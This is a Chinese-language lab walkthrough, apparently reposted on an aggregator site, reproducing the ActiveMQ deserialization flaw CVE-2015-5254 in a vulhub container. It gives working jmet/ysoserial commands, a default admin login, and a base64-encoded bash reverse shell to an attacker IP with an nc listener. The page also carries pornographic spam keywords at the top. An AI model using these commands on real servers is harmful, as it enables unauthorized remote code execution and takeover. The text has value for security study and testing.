国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ActiveMQ反序列化漏洞原理+復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了ActiveMQ反序列化漏洞原理+復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

ActiveMQ反序列化漏洞

ActiveMQ

ActiveMQ是開源消息總線,消息中間件

工作原理

通過(guò)使用消息隊(duì)列,實(shí)現(xiàn)服務(wù)的異步處理,主要目的是減少請(qǐng)求響應(yīng)時(shí)間和解耦合。

消息隊(duì)列,服務(wù)器A將客戶發(fā)起的請(qǐng)求放入服務(wù)器B的消息隊(duì)列中,服務(wù)器B從消息隊(duì)列中取出并處理。

從以上內(nèi)容中可以看出,消息中間件的主要功能就是為了解耦合、消峰和異步,即解決高并發(fā)問(wèn)題和系統(tǒng)間的RPC交互繁雜問(wèn)題。

漏洞原理

此漏洞源于程序沒(méi)有限制可在代理中序列化的類。遠(yuǎn)程攻擊這可借助特制的序列化的Java Message Service(JMS)ObjectMessage對(duì)象利用該漏洞執(zhí)行任意代碼。

解釋說(shuō)明

ActiveMQ通過(guò)消息隊(duì)列來(lái)實(shí)現(xiàn)信息傳遞,每個(gè)消息要保證發(fā)出端和接收端格式相同,其中使用了序列化的方法進(jìn)行傳遞,在這個(gè)過(guò)程中沒(méi)有限制可在代理中序列化的類,這時(shí)候我們就可以自己構(gòu)造一份序列化的惡意代碼payload,將其作為事件發(fā)到ActiveMQ服務(wù)上,在管理員在后臺(tái)管理時(shí)觸發(fā)了payload,或者攻擊者使用弱口令拿到ActiveMQ的賬戶,并執(zhí)行了payload,則可以成功利用該漏洞

使用限制
  1. ActiveMQ的版本<=5.13.0
  2. payload需要主動(dòng)觸發(fā)
漏洞復(fù)現(xiàn)
實(shí)驗(yàn)配置

靶機(jī)地址:192.168.27.128:

攻擊機(jī):192.168.27.129

創(chuàng)建容器

ps:如果沒(méi)有安裝好docker請(qǐng)看上篇文章

cd vulhub

cd /activemq/CVE-2015-5254

docker-compose up -d

環(huán)境運(yùn)行后,將監(jiān)聽61616和8161兩個(gè)端口。其中61616是工作端口,消息在這個(gè)端口進(jìn)行傳遞;8161是Web管理頁(yè)面端口。

測(cè)試靶機(jī)

用攻擊機(jī)訪問(wèn)靶機(jī)ip:8161,查看是否開啟成功

activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全

看到如下頁(yè)面,則說(shuō)明安裝成功

漏洞利用
  1. ysoserial是java反序列化利用的工具之一,其中集合了各種java反序列化的payload
  2. jmet集成了ysoserial,所以我們只需要安裝jmet即可
  3. 將序列化對(duì)象作為一個(gè)消息,發(fā)送給目標(biāo)61616工作端口
  4. 訪問(wèn)web管理頁(yè)面,讀取消息,觸發(fā)漏洞
安裝jmet

cd /opt

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全

直接輸入到終端即可

構(gòu)造測(cè)試payload

java -jar jmet-0.1.0-all.jar -Q chenevent -I ActiveMQ -s -Y “touch /tmp/chen.txt” -Yp ROME 192.168.27.128 61616

使用ROME payload 把touch /tmp/chen.txt 命令序列化后作為名為chenevent的消息發(fā)給ActiveMQ

-Q 指定消息名

-I 選擇要裝載的JMS客戶端

-s 選擇ysoserial paylad

-Y 指定命令

-Yp 指定payload

最后是ip與端口

activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全

打開web頁(yè)面

賬號(hào)密碼都是admin

如圖操作

activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全
activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全

用靶機(jī)連接到docker容器,查看tmp目錄下是否存在chen.txt

docker exec -it 容器id /bin/bash

docker ps 看容器id

activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全

看到chen.txt說(shuō)明測(cè)試成功啦

終極目標(biāo)!拿到shell

來(lái)個(gè)制作反彈shell的網(wǎng)站

https://www.revshells.com/

[外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機(jī)制,建議將圖片保存下來(lái)直接上傳(img-yLBGey4w-1678327567182)(C:\Users\34232\AppData\Roaming\Typora\typora-user-images\image-20230309093515332.png)]

sh -i >& /dev/tcp/192.168.27.129/8023 0>&1

反彈shell一般都需要加密,咱就base64一下

base64加密網(wǎng)站:http://www.jsons.cn/base64/

c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNy4xMjkvODAyMyAwPiYx

構(gòu)建payload

和上面測(cè)試payload一樣,將命令替換即可

java -jar jmet-0.1.0-all.jar -Q chenevent -I ActiveMQ -s -Y “bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNy4xMjkvODAyMyAwPiYx}|{base64,-d}|{bash,-i}” -Yp ROME 192.168.27.128 61616

攻擊機(jī)先開啟端口監(jiān)聽,監(jiān)聽8023端口

nc -lvnp 8023

然后開新終端輸入payload,靶機(jī)模擬管理員點(diǎn)擊事件

activemq 漏洞,滲透測(cè)試,Vulnhub,java-activemq,activemq,java,網(wǎng)絡(luò)安全

成功拿到shell!文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-744662.html

到了這里,關(guān)于ActiveMQ反序列化漏洞原理+復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • shiro 721 反序列化漏洞復(fù)現(xiàn)與原理以及Padding Oracle Attack攻擊加解密原理

    shiro 721 反序列化漏洞復(fù)現(xiàn)與原理以及Padding Oracle Attack攻擊加解密原理

    知道aes加密的key且目標(biāo)服務(wù)器含有可利用的攻擊鏈。 原理 在Shiro = 1.2.4中,反序列化過(guò)程中所用到的AES加密的key是硬編碼在源碼中,當(dāng)用戶勾選RememberMe并登錄成功,Shiro會(huì)將用戶的cookie值序列化,AES加密,接著base64編碼后存儲(chǔ)在cookie的rememberMe字段中. 服務(wù)端收到登錄請(qǐng)求后,

    2024年02月05日
    瀏覽(20)
  • 反序列化漏洞及漏洞復(fù)現(xiàn)

    反序列化漏洞及漏洞復(fù)現(xiàn)

    問(wèn)題 :為什么要序列化? 序列化,“將對(duì)象的狀態(tài)信息轉(zhuǎn)換為可以存儲(chǔ)或傳輸?shù)男问降倪^(guò)程”,這種形式大多為字節(jié)流、字符串、Json 串。在序列化期間內(nèi),將對(duì)象當(dāng)前狀態(tài)寫?到臨時(shí)或永久性的存儲(chǔ)區(qū)。以后,就可以通過(guò)從存儲(chǔ)區(qū)中讀取或還原(反序列化)對(duì)象的狀態(tài),重

    2024年02月09日
    瀏覽(27)
  • 漏洞復(fù)現(xiàn)——shiro反序列化

    漏洞復(fù)現(xiàn)——shiro反序列化

    今天咱們的主角是shiro反序列化命令執(zhí)行漏洞。該漏洞在HVV等大型攻防項(xiàng)目中,經(jīng)常被作為突破口。簡(jiǎn)單介紹了解一下還是很有必要的。廢話不多說(shuō),進(jìn)入正題。 一、漏洞描述: Apache Shiro是美國(guó)阿帕奇(Apache)軟件基金會(huì)的一套用于執(zhí)行認(rèn)證、授權(quán)、加密和會(huì)話管理的Java安

    2024年02月09日
    瀏覽(25)
  • typecho 反序列化漏洞復(fù)現(xiàn)

    typecho 反序列化漏洞復(fù)現(xiàn)

    下載typecho14.10.10? 安裝,這里需要安裝數(shù)據(jù)庫(kù) ?POC.php ?POST數(shù)據(jù)包如下,訪問(wèn)install.php并攜帶參數(shù)finish,Referer來(lái)自本網(wǎng)站,POST傳遞惡意參數(shù) 步驟和前面一樣,把payload放_(tái)_typecho_config=就行

    2024年02月09日
    瀏覽(27)
  • Fastjson反序列化漏洞復(fù)現(xiàn)小結(jié)

    Fastjson反序列化漏洞復(fù)現(xiàn)小結(jié)

    簡(jiǎn)單來(lái)說(shuō):Fastjson是解析JSON格式的字符串的,允許用戶在輸入JSON串時(shí)通過(guò)“@type”鍵對(duì)應(yīng)的value指定任意反序列化類名,進(jìn)而執(zhí)行類里的惡意代碼。 1、Fastjson1.2.24遠(yuǎn)程代碼執(zhí)行(CNVD-2017-02833 ) 2、Fastjson=1.2.47遠(yuǎn)程代碼執(zhí)行漏洞(CNVD-2019-22238) 3、Fstjson =1.2.60 遠(yuǎn)程代碼執(zhí)行漏洞

    2023年04月08日
    瀏覽(25)
  • Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    ? ? ?Hessian是二進(jìn)制的web service協(xié)議,官方對(duì)Java、Flash/Flex、Python、C++、.NET C#等多種語(yǔ)言都進(jìn)行了實(shí)現(xiàn)。Hessian和Axis、XFire都能實(shí)現(xiàn)web service方式的遠(yuǎn)程方法調(diào)用,區(qū)別是Hessian是二進(jìn)制協(xié)議,Axis、XFire則是SOAP協(xié)議,所以從性能上說(shuō)Hessian遠(yuǎn)優(yōu)于后兩者,并且Hessian的JAVA使用方法非

    2024年02月11日
    瀏覽(34)
  • Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

    Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

    序列化(Serialization):將對(duì)象的狀態(tài)信息轉(zhuǎn)換為可以存儲(chǔ)或傳輸?shù)男问降倪^(guò)程,一般將對(duì)象轉(zhuǎn)換為字節(jié)流。序列化時(shí),對(duì)象的當(dāng)前狀態(tài)被寫入到臨時(shí)或持久性存儲(chǔ)區(qū)(文件、內(nèi)存、數(shù)據(jù)庫(kù)等)。 反序列化(Deserialization):從序列化的表示形式中提取數(shù)據(jù),即把有序字節(jié)流恢

    2024年02月07日
    瀏覽(29)
  • CVE-2023-21839:Weblogic反序列化漏洞復(fù)現(xiàn)

    聲明:僅供學(xué)習(xí)參考使用,請(qǐng)勿用作違法用途,否則后果自負(fù) 在進(jìn)行漏洞復(fù)現(xiàn)前簡(jiǎn)單描述一下什么是序列化和反序列化: 1、序列化和反序列化的定義: (1)Java序列化就是指把Java對(duì)象轉(zhuǎn)換為字節(jié)序列的過(guò)程。 Java反序列化就是指把字節(jié)序列恢復(fù)為Java對(duì)象的過(guò)程。 (2)序列化最重

    2024年02月13日
    瀏覽(20)
  • Laravel 9.1.8 反序列化漏洞分析及復(fù)現(xiàn)

    Laravel 9.1.8 反序列化漏洞分析及復(fù)現(xiàn)

    反序列化漏洞是如今很常見(jiàn)的漏洞類型,有很多分類,也有很多繞過(guò)方式。本文選取了一個(gè)今年比較典型的反序列化漏洞,進(jìn)行了一個(gè)分析并復(fù)現(xiàn)。 Laravel是一套簡(jiǎn)潔、優(yōu)雅的PHP Web開發(fā)框架。 近日,Laravel 被披露存在多個(gè)安全漏洞,可允許通過(guò)反序列化POP鏈實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行

    2024年02月06日
    瀏覽(30)
  • WebLogic反序列化漏洞復(fù)現(xiàn)+利用工具(CVE-2021-2394)

    WebLogic反序列化漏洞復(fù)現(xiàn)+利用工具(CVE-2021-2394)

    Oracle官方發(fā)布了2021年7月份安全更新通告,通告中披露了WebLogic組件存在高危漏洞,攻擊者可以在未授權(quán)的情況下通過(guò)IIOP、T3協(xié)議對(duì)存在漏洞的WebLogic Server組件進(jìn)行攻擊。成功利用該漏洞的攻擊者可以接管WebLogic Server。 這是一個(gè)二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的

    2024年02月06日
    瀏覽(37)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包